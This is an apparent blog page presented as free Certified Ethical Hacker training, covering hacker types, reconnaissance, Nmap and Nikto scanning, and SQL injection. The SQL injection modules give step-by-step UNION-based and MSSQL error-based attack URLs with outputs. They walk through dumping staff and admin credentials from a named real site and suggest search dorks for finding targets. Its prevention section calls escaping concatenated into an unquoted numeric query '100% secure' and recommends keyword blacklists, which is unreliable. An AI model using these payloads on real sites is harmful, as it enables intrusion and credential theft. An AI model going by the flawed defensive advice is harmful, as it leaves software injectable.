Free C|EH Traning

Free Certified Ethical Hacker (C|EH) Traning 

 

Introduction

 

How to become an hacker ? This is an very common question asked many times. People also used to search this question online.well becoming a hacker is not so hard task but not so easy also,the only thing you need is dedication ,interest and time and little bit knowledge of internet and programing. Rest of the knowledge you will get while training period.


First of all our team will like to welcome the newbies in the dark world of hacking. Yes it is the dark world once you got interest in hacking ,you will never leave it.You will become addict to hacking.

The very first thing to become an hacker is to have an hacker's attitude.You must have seen in Hollywood movies that the guy is working in a room with so many computers and gadgets around him with a different colors of screen and something like that.But in reality  hacking is different from it .That was just to create the environment of hacking.Night yes night is the god gift for hackers,all the hackers used to do their work at night.
Hackers always used to think to create new applications and do something creative .They never wasted their times in sleaping and enjoying.One thing which i personally noted is that hackers love blogging , i have seen each hacker write many blogs.

If we go to past , at that time only few hackers were there , because at that time hackers must have expertise knowledge of programming languages and hacking thinking ,they used to make their own tools and vulnerabilities which was very difficult. But today any one with basic knowledge can become hacker as many hacking tools and software's are available on internet ,the only thing one must have is time and dedication. follow more and more blogs and keep yourself updated in cyber world.

With the increasing interest of people in Information Technology , increasing IT industries, and increasing cyber crimes ,need of ethical hackers is also increasing. According to Nasscom The information security market in India is currently estimated to be at $500 million and growing by 20-30 percent annually · NASSCOM predicts that India will need 77,000 ethical hackers every year · The global information security products and services market is estimated to grow to $79 billion by 2010.

So there is an good career in ethical hacking,because India does not produce the required security experts .
Choosing C|EH is an good idea to make your career bright.Many other courses are also there in the field of security ,which you can take advice from our experts after you completed C|EH.

This is the just the begging you must know to enter in the dark world of hacking.Now after reading this you must proceed to Introduction Part of Hacking.






___________________________________________________________________________________

(Cyber Ethics :  Module 1)

________________________________________________________



________________________________________________________________
Hacking & Cracking
________________________________________________________________

“Hacking” is a activity of intrusion and exploiting into computer system or network and an art of exploring security breaches . Hacking has both positive and negative aspects.Activities done for some good purpose along with permission is termed as “hacking” and the the activity done illegally for the greed , shake of money or to destroy is term as “cracking”. Both the words means the same  but only the difference is in their thinking . Cracking is illegal activity but hacking is legal. According to Indian IT act their is no difference between hacking and cracking ,every act done towards breaking into computer system and network is known as hacking and is illegal.
Some other terms are also there ,please see them !!!!


________________________________________________________________

 Who Are Hackers
________________________________________________________________

 Hackers
Hackers are intillegents computer professionals who likes to explore and learn about the back-end working of computer and networks.Hackers are experts in the field of computing.They find vulnerabilities in system and share knowledge by seminars and every possible ways to make people aware.Hackers are usually misconception with the term that hackers are the one who break into computer security and network for his own use.



________________________________________________________________

 Who Are Crackers
________________________________________________________________

Cracker
Crackers are those who breaks into computers and networks security for malicious intent , for personal gains for revenge and money .They usually hack banks accounts , credit cards ,causes defacement and can cause financial losses.They are cyber criminals.



_____________________________________________

 What Is Script Kiddies

_____________________________________________

 Script Kiddies

Script kiddies are those guys who are new in the feild of hacking , Mostly they are tracked by police because they don't know to save them-self or to become anonymous.They don't have any technical skills of hacking and use the tools developed by other hackers without having the knowledge of what happening behind the screen.
They are learners and they enjoyed hacking emails accounts etc.
They usually hack for fun !!


_____________________________________________

Black Hat Hackers

_____________________________________________


They are known as bad guys and use their skills for illegal activities and destructive manner to take revenge and to gain money.They find vulnerablities and later on exploit them . They hack for their own means !!



_____________________________________________

 White Hat Hackers

_____________________________________________

They are known as good guys and use their skills for good and constructive  manner.They found vulnerablities ,loop holes and their solutions.They usually share their knowledge for awaring people.



_____________________________________________

 Who Are Phreakers

_____________________________________________


Phreaks are those who use computer applications and networks to hack into phone networks.They find loopholes in phone network with the intent to make free calls. They can be resposible for your huge phone bill amount without using services.

_____________________________________________

Hackers Strategies

_____________________________________________

  
“Every hacker use some predefined steps to hack target system”                                              

 Reconnaissance     : The basic information gathering   about the target is  known as Reconnaissance.

Scanning : Scanning is the process scanning the target system for the open ports and services running on the target system.













 Gaining Access       : Gaining the access or control on the target system by exploiting it.
 
   Maintaining access : Maintaining the access of the system even after leaving the system.

  Clearing tracks   : To remove the footprints left behind so as to remain undetected and safe from the victim. 

___________________________________________________________________________________

Information Gathering
( Module 2 )
___________________________________________________________________________________

Reconnaissance is also known as  Information gathering. Reconnaissance is the process of collecting the information from different places on internet about any individual ,company,organisation ,server,Ip address or any criminal.

Information gathering or reconnaissance is the first step of hacking and most of the time of hacker is spend in this process. 90% of time of a hacker spend in information gathering and rest 10% in attacking and gaining access. Information gathering plays a very vital role for both  investigating and attacking purposses

________________________________________________________________

Investigators Point Of View

________________________________________________________________

As an investigator information gathering is powerful tool used in  investigation. Investigator will gather information like traces of criminal,name,address,contact no,company info etc before taking any legal action . Investigators use tools and social networking site to gather information about criminal.

________________________________________________________________

Attackers Point OF view

________________________________________________________________

Information Gathering As Attacker's Point Of View

Attacker will first gather information like domain name ,Ip address, Ip range ,operating system ,services,control pannel ,vulnerable services etc and later on exploit it.Attackers use tools and social engineering to gather information.For attacking an individual person he will find his name ,address,date of birth,phone no ,and his personal information and then use that information for attacking that person.

________________________________________________________________

 Information Gathering Tools & Sites

  ( Search Engines & Social Networking)

________________________________________________________________

Search Engines
As internet is in reach of every person and one leaves his footprints while surfing internet.Every hacker and investigator use search engines for information gathering .


Google and yahoo search engines give the best result out of all .Kartoo and maltego are relational search engines .These types of search engines retrieves results from different search engines and make connection between them.


Kartoo >> www.kartoo.com


Maltego >> www.maltego.com
Matego is an open source intellegence and forensics softwares. It helps  in mining and gathering of information .


Social Networking


Information gathering can be done through blogs and forums. Everyone use blogs and forums  for knowledge. Today is the world of social networking and almost all the internet users uses social networking for networking purposes. Some social sites which have largest number of users are:



www.orkut.com







Job sites are almost used by every proffetionals for job purposes.So for investigator as well as attacker job sites are very usefull for information gathering.


Some other websites used for information gathering are :




________________________________________________________________


Reverse Ip Mapping
________________________________________________________________


Reverse Ip mapping
Using the reverse Ip we can find the number of websites hosted on that server.If a single website on that server is vulnerable than a attacker can hack all the website hosted on that same server,he can easily root that server.



________________________________________________________________

 Who Is Database
________________________________________________________________


Who is database is the database to find the information about the websites.It provides the information about the owner of the website ,email used to register the website ,address,domain registratar,server information and many other information.

We can find server information by writing a query Nslookup in cmd.

Cmd
C:\user\nslookup best4hack.blogspot.com


________________________________________________________________

 Email Spiders
________________________________________________________________

Email spiders

Email spiders are the automated softwares which collects and captures email ids and Stores it in database.Mainly spammers used these email spiders to collects thousand of emails for spamming.

___________________________________________________________________________________
Scanning
(Module 3)
___________________________________________________________________________________

Scanning : What Is Port Scanning


Many time ago we scanned the different ports making telnet manually. Today people use more sophisticated programms with massive methods to scan IP ranges searching a lot of ports.
Scanning is the process of finding out open /close ports ,vulnerabilities in remote system, server & networks. Scaning will reveal IP addresses, operating system , Services running on remote computer.


There are three types of scanning
1. Port Scanning
2. Network Scanning
3.Vulnerability Scanning


Port Scanning  : Port scanning is one of the most popular technique attacker use to   
                                  discover the service they break into.

>> All the machines connected to a LAN or connected to internet  via modem run many . 
      services that listen at well-known and not so well known ports
>> There are 1 to 65535 ports are available in the computer .
>> By port scanning the attacker finds which ports are available.

Ports : The port numbers are unique only within a computer system.
>> Port number are 16-bit unsigned numbers.
>> The port numbers are devided into three ranges.

1. Well known ports  ( 0.....1023)
2. The registered ports  ( 1024........49151)
3. The Dynamic and/or private ports (49152....65535)

Some well known ports:
>> echo                        7/tcp          Echo
>> ftp-data                  20/udp      File transfer (Default Data)
>> ftp                            21/tcp       File transfer (Control)
>> ssh                           22/tcp       SSH Remote login Protocol
>> Telnet                     23/tcp       Telnet
>> domain                    53/udp      Domain name server
>> www-http               80/tcp       World Wide Web Http
>>Smtp                         25/tcp       Simple mail transfer protocol
>Whois      >                 43/tcp        whois server

Some registered Ports:
>> wins                         1512/tcp                   Microscope windows internet name service
>> radius                      1812/udp                 RADIUS authentication protocol
>> yahoo                       5010                         yahoo! Messenger
>> x11                           6000-6063/tcp      X Windows System



________________________________________________________________
 Nmap Port Scanner
________________________________________________________________


This article will talk about the practical aspect of Nmap, how to perform a quick scan to know about the open ports and services?
Nmap was originally command line tool that has been developed for only Unix/Linux based operating system but now its windows version is also available and ease to use.You can download the Nmap installer for windows and for Linux open terminal and type sudo apt-get install nmap .



Ok now we are going to start with simple scan, for nmap help

$ nmap --help

For a quick and simple scan use.

$ nmap 192.168.1.1

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-08 23:06 PKT
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 6.22 seconds
Is it simple scan? Yes it is a simple scan that let you know about the open ports in any machine, now if want to scan a whole network than you have to type this with subnet.

$ nmap 192.168.1.1/24 or $ nmap 192.168.1.*


Nmap - Interesting options

-f fragments packets

-D Launches decoy scans for concealment

-I IDENT Scan – finds owners of processes (on Unix systems)

-b FTP Bounce

Port Scan Types

TCP Connect scan

TCP SYN scan

TCP FIN scan

TCP Xmas Tree scan (FIN, URG, and PUSH)

TCP Null scan

TCP ACK scan

UDP scan 
Nmap works on the basic scanning types like:

TCP connect() scanning
TCP SYN scanning
TCP FIN scanning 
Fragmentation scanning 
TCP reverse ident scanning 
FTP bounce attack 
UDP ICMP port unreachable scanning 
UDP recvfrom() and write() scanning 
ICMP echo scanning
Operating system detection or OS fingerprnting is the important part of scanning you should know about the operating system of target machine to launch an available exploit on it. Nmap provides you know about running operating system although you can find it by using banner grabbing but why doing to much job. Use -O for operating system.
$ nmap -O 192.168.1.1


________________________________________________________________ 
 Nikto Vulnerability Scanner
________________________________________________________________

Nikto Vulnerability Scanner


In the field of web application securitythere are so many tools available to measure the security of a web application, these tools available for different operating system and can use to find out the bug on a web application. In the era of these tools we have nikto also.


Nikto is not a new tool, it is used by a large community to find the vulnerability on a web application.



->Nikto is open source
->It can check a web server for over 6400 potentially
   dangerous files/CGIs.
->It checks for outdated versions of over 1000 servers, and  
   version specific problems on over 270 servers
->It checks the plug in and misconfiguration files.
->Fast
->Effective
->It find out the default files and programs
->It find out the insecure files and programs


Key Features
->Full HTTP proxy support
->Apache user name enumeration
->Logging to metasploit
->Secure Socket Layer support (SSL)
->Subdomain brute forcing (guessing)
->Easy to update
->Save report on multiple format


Requirement
->A operating system that has perl install in it
->OpenSSL: http://www.openssl.org/
->ActiveState Perl: http://www.activestate.com/


Nikto Tutorial
->The basic scan requires a host to scan, you can use a IP of 
    the server of just host name.


$ perl nikto.pl -h [target host]


->For help


$ perl nikto.pl -H


->If you want to check different port than use


$ perl nikto.pl -h [target host] -p [port number]

->If you want this test via proxy than you can use by this 
    command


$ perl nikto.pl -h [target host] -useproxy http://localhost:8080/


->Now for updating nikto use




________________________________________________________________
 Webcruiser Vulnerability Scanner
________________________________________________________________

Webcruiser Vulnerability Scanner


Webcruiser is a Web Vulnerability Scanner which perform basic and some advance scanning good thing is this tool does not require you to be any kind of specialist any one with little knowledge of scanners can run this tool, This will also help you to increase your knowledge base.





Features of Webcruiser:
- Crawler(Site Directories And Files);
- Vulnerability Scanner(SQL Injection, Cross Site Scripting);
- POC(Proof of Concept): SQL Injection and Cross Site 
   Scripting;
- GET/Post/Cookie Injection;


- SQL Server PlainText/FieldEcho(Union)/Blind Injection;
- MySQL FieldEcho(Union)/Blind Injection;
- Oracle FieldEcho(Union)/Blind Injection;
- DB2 FieldEcho(Union)/Blind Injection;
- Password Hash of SQL Server/MySQL/Oracle Administrator;
- Time Delay For Search Injection;
- Auto Get Cookie From Web Browser For Authentication;
- Auto Check Database Type;
- Auto Get KeyWord;
- Multi-Thread;
- Adcanced:Proxy,Escape Filter.

How to identify sql injection with WebCruiser?

1. Input URL or Right click a vulnerability, select SQL Injection POC, then Click “Get Environment Information”.

2.If you need more information, switch to “POC[DataBase]”:
   and scan

Whats missing in WebCruiser?
It would have been best if there was some interface to which would take our custom input and scanner and return the result so we would also test for known vulnerabilities or zero days which are not incorporated in this version.

Download WebCruiser here


___________________________________________________________________________________
SQL Injection
(Module 4 :Hacking Webservers)
___________________________________________________________________________________
Basic SQL Injection
________________________________________________________________

Sql injection is a flaw in " web application" development. It is not a database or webserver problem.Many programmers are still not aware of this problem.Alot of the tutorials & demo "templates" are vulnerable.Even lots of solutions posted on the internet are not good enough.In pen test over 60% of clients turn out to be vulnerabe to sql injection.





//Hey guys it is most important flow .So please read the full tutorial as this is just the basic of sql injection. //

Impact of Sql Injection :
* Access the entire database schema.
* Steal,modify,and delete database contents.
* Prevent legitimateaccess to the database.
* Run operating system commands on database server.
* Disclose company proprietary data.

Common Vulnerable login query:
* SELECT * FROM users WHERE login='victor' AND password='123'.
* var sql="SELECT * FROM users WHERE login="'+formusr+ '" AND password="'+frompwd+'";



Injecting Through Strings:
* formusr='or1=1--
* fprmpwd=anything
* SELECT * FROM users WHERE username='' or 1=1-- AND password='anything'

The Power of '
* It closes the string parameter.
* Everything after is consudered part of the SQL command.

Some Standard SQL Commands such as :
"Select","Insert","update","delete","create", and "drop" can be used to accomplish almost everything that one needs to do with a database.

You have seen many time urls like www.freeceh.in/news.asp?ArticleID=10
This link tells the site to look in the table that stores the article names for an article who's "ArticleID" is 10.
The "TNFORMATION_SCHEMA" holds the names of every table and column on a site.On every SQL server there will be an "INFORMATION_SCHEMA" and its name will never change.

Understanding Error Messages:
* Example : www.freeceh.in/index.php?id=1
* Add 'or/* after id=1 to check whether site is vulnerable or not.
* If site is giving some error then site is vulnerable to SQL inection.
* If blank page is shows then the site is vulnerableto blind injection.

Now Finding out Vulnerable Columns
* Example: www.freeceh.in/index.php?id=1+order+by+1--
* Increase order till you get an error message something like "Unknown Column in 'Order' Clause.


 ________________________________________________________________
 Hacking Webserver by SQL Injection
________________________________________________________________


Basic SQL Injection walkthrough with bizjournal.com as an example.(Not vulnerable Now)

You can find many vulnerable websites using  dorks.

Code:
http://www.bizjournal.com/content/article.php?id=124


The first thing you'll do is point your browser to that site then add a tick at the end of it.



 Code:
http://www.bizjournal.com/content/article.php?id=124'


Success! You will get the valuable SQL Error that your looking for.


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1

Now it is time to discover how many columns the database has.
The easiest way to do this is by using the "Order By" statement in SQL
There are many other ways to do this but, this is the way I use.
So to do it first you will put in the url and add this to the end "order by 1--"


Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--

You'll notice that the site loads normally, because it has 1 column in its database.
The next thing will be to make it a negative interger so that you don't get all of the fuzz from the
site and make it cleaner to see what your doing.

http://www.bizjournal.com/content/article.php?id=-124 order by 1--

Notice it is a negative 124 now "-124"

Now its time to find out just how many columns it has. You do this by increasing the order by number:


Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--

Success! it errors on "order by 11--" It does this because there aren't 11 columns in the database.
So now that we know we have only 10 columns we go into a new statement "UNION SELECT ALL".
This can be done a number of ways too but this is the way I do it.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--


What this does is searchs the database and returns which columns have data stored in them.
Notice that we have data stored in columns 2,3 and 4.
The next step will be to get the websites database version. We do this with a simple "@@version"
in place of one of the numbers where data is stored, I will use 4.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--

This will return the database version in the site where the number 4 was located.
Our version is:
5.0.67-log

Next step is to get the table names, now this is where alot of the tutorials fall short, the so the simple:
from information_schema.tables--
This will not generate just the user created tables this will show you a bunch of garbage such as CHARACTER_SETS, COALLATIONS, etc...
What we will do is just add on to this code with:
from information_schema.tables WHERE table_schema=database()--

To make this work on site we need to use the statemenet "group_concat" to display the tables:
group_concat(table_name)

For columns:
group_concat(column_name)

Example:


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


Ahh now we have the user created table names:

Code:
archives,articles,articles2,digest,edition,events,
links,nomination,sections,staf?f,survey

Now you need to look at the table names and decide which one would hold sensitive
data, to me
"staff" looks like a good choice.
So we will remember that for in a minute.

Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--




Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title
,author,abstr?act,body,section,
keywords,photo,caption,caption2,caption3,caption4,lead,id,date,title
,author,abstract,body?
,section,keywords,photo,caption,caption2,caption3,caption4,lead,i
d,date,title,city,body
,id,volume,number?,date,id,title,body,month,day,year,date,time,time2,
location,cost,contact,phone,
email,url,approved,id?,url,title,category,description,id,date,nominator,
nominatortitle,nominatorcompany
,nominatoraddress,n?ominatorcity,nominatorstate,nominatorzip,
nominatorphone,nominatorfax,
nominatoremail,nomineeco?mpany,nomineeaddress,nomineecity,
nomineestate,nomineezip,
nomineephone,nomineefax,nomineeweb,reason,re?asonother,sat1
,sat2,sat3,sat4,sat5,ethics1,
ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,de?v1
,dev2,dev3,dev4,dev5,dev6,
dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,
quality2,contac?t1name,contact1title,
contact1phone,contact1email,contact2name,contact2title,contact2phone,
contact2ema?il,contact3name,
contact3title,c

Now you need to sift through these column names and find ones of interest to us. But what happens when you don't see a column like username or password?

Well sometime some of the columns will be cut off notice the "contact3title,c" at the end of the list.
Now its time to do a little guessing, this time its easier than most. username and password are both column names.

So to get check the columns we will use "group_concat" again but with our guessed column names and instead of:
from information_schema.tables where table_schema=database--
We will use:
from staff--
Remember I told you to remember the table name from earlier.

To give you an idea of what a wrong column name would look like it will look like this:
Note: 0x3a is the hex code for the colon ":"

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--

But we will try username and password this time.


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--


Bingo! We have a short list of usernames and they arent even hashed:

Note: I am not responsible for any misuse of this tutorial.this is just for educational purposes.
________________________________________________________________
Hacking Microsoft SQL Server
________________________________________________________________



There are various types of sql injection for MICROSOFT here as follows:

1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack

Here m going to explain the first one "sql with convert"

STEP 1:

First we need to find a vulnerable site.

By adding a single quote (') double quote (";") or a semicolon  to the field under test.

eg:
http://www.example.com/news.asp?id=10'
http://www.example.com/news.asp?id=10;

It's vulnerable in SQL injection,If the output shows some error like this:

[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------

Also error could be something like below

Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4

If the errors like above are shown then site could be vulnerable in SQL

Also you can find vulnerable site from google dork.

eg

inurl:age.asp?id=
inurl:index.asp?sid=
u can see sql dorks in my old posts.
STEP 2:

Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.

Now we start with our assessment by finding MSSQL_Version, DB_name.

http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)


 [http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

/includes/templates/header.asp, line 21

-----------------------------------------------------------

We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)

Let's go to enumerate DB_name.

http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'IPC' to data type int.

/includes/templates/header.asp, line 21
------------------------------------------------------------

The data base name is IPC.

http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

The use operating database is ipcdc....

STEP 3:

NOW LETS FIND TABLES IN DATABASE

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables))--

"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------

Second table 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'admin' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'

Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--

If the query returns something like this.

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.

STEP 4:

Now we are all set.....and we will find columns in admin table

We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'))--

[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'username' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--

the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'passwd' to data type int.

/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'


Do this like we did url manipulation for tables .
Dont forget to add where clause .untill u get error like this.

[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22

-----------------------------------------------------------------

STEP 5: RETRIEVING USENAME n PASSWORD etc

Now lets see what we got from above

table_name: 'admin','siteStatus' n 'HeaderGraphic'

Here we are interestedin 'admin'.So we found columns fo 'admin'

column_name:'username' n 'passwd'

LETS do our work now

http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+user name+from+admin))--
You will get first username in terms of error
eg sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+pass wd+from+admin))--

You will get passwd.
eg comic123


So u own .....MSSQL server wid

USERNAME: sa_admin
PASSWORD:comic123

Note:
1) you can use AND/OR both
2) Dnt forget , (comma) after 'int' in convert()
3) In error after ' (upper comma) is your table_name of column_name or etc
4)you can enemerate more usernames n passwords by using 'not' command

We have learn how to hack webserver by sql injection but now we will learn how to prevent webservers from Sql Attacks.
________________________________________________________________
 Preventing webserver from Sql Attacks
________________________________________________________________

SQL Injection still used by script kiddies , gery and even by black hat hackers, its the easiest way to hack into some one's website. So today in this article i will give you some tips to, how to prevent SQL injection on your own or may be company's website.

 1. Don't allow special characters 
As we all know the SQL strings are often having 
special symbol strings, making a combination on OR and =. So try to have stroke procedures instead of SELECT * FROM table name where Username="..." and Password="...", This is the global code and vulnerable. So try to validate your code and try to avoid acceptance of special symbols. 

2. Use Email Instead of User ID
 The best way to prevent SQL injection is to have use of Suer name as Email address. So what is happening here the code written will validate in such a way that it will not accept anything else instead of EMAIL address. Thus SQL injection strings are non acceptable hence SQL injection can be prevented. 


3. Try to Hide Your Admin Login Page
 Well there is no security in this universe there is only opportunity, and if you are showing your ADMINLOGIN page link on your website then that means you are giving the opportunity to the HACKER. Its an obvious thing that SQL injection can only be done through on your admin login panel (Some times through URL) and User login panel. So don't show ur adminlogin link direct on your website.

4. Don’t use default AdminLogin page 
Other way is to protect your website from SQL injection is to name ur AdminLogin according to you. Try to hvae login page links like "powerlogin.asp","herologin.asp" means something different which cannot be found eaisly on the Google hacks. So when a hacker try to search your admin login page he/she(for Female hackers he he), he will search for adminlogin.asp ,admin/login.asp something like this. and as result will be frustrated and hence will leave your website. 

5. Social Engineering
 Don't disclose your website vulnerabilities to anyone. try to get help from GOD istself GOD here i call (GOOGLE). Instead of discussing your website vulnerabilities to a single person try to search for the solutions on google.And last but not least have an WARNING message on your login pages something scary like" We are using transparent proxy do not try to and HACK, otherwise an legal action would be taken.". That code really works he he, at least before trying to hack into you website, he will think twice. So hope this unique article will help the website developers to prevent SQL injection attacks. This is the first ever article by anyone having these techniques. 

There are number of things you can do... I will show you a few more herefor PHP Devolpers ...

Alternative one
Lets say thins is your code:
Code:
---------------------------------------------------------------------------------------------
<?php

$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
echo($result);

?>
----------------------------------------------------------------------------------------------
sql injections penetration test electrical engineering data base sql servers numbering sql server error

This means that you are selecting the page content witch is 'text' from 'pages' in the SQL database, and you are sorting out the right page content with $_GET['id'] and $_GET['id'] is the thing in the url... Example; http://www.freeceh.in/index.php?id=123

This code is easely injecteble... But if you do this:
Code:
--------------------------------------------------------------------------------------------
<?php

$result = mysql_query('SELECT text FROM pages WHERE id=' . mysql_real_escape_string($_GET['id']));
echo($result);

?>
-------------------------------------------------------------------------------------------
You are 100% secure

Alternative two
This one is not as good as the first one... But still works

Again we say this is your php code:
Code:
---------------------------------------------------------------------------------------------
<?php

$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
echo($result);

?>

--------------------------------------------------------------------------------------------
Again this is verry simple to inject... But if you check $_GET['id'] for "iligal" characters! Like this:
Code:
-----------------------------------------------------------------------------------------------------------
<?php

$pos = strrpos(strtolower($_GET['id']), "union");
if ($pos === false){}else
{
die;
}

$pos = strrpos(strtolower($_GET['id']), "select");
if ($pos === false){}else
{
die;
}

$pos = strrpos(strtolower($_GET['id']), "information_");
if ($pos === false){}else
{
die;
}

$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
echo($result);

?> 
--------------------------------------------------------------------------------------------

________________________________________________________________
How to find sql vulnerable websites
________________________________________________________________

We use google hacking to find vulnerable websites !! Google Hacking is an another module of C|EH which ill discuss after this module!!

Now we will use some dorks to find sql vulnerable websites !!!  Just copy one dork in google search engine and c the result, there comes lot of websites with id=? . Mostly 50% of them are sqli vulnerable . 
Click here for the sqli dorks ! 

Related Posts Plugin for WordPress, Blogger...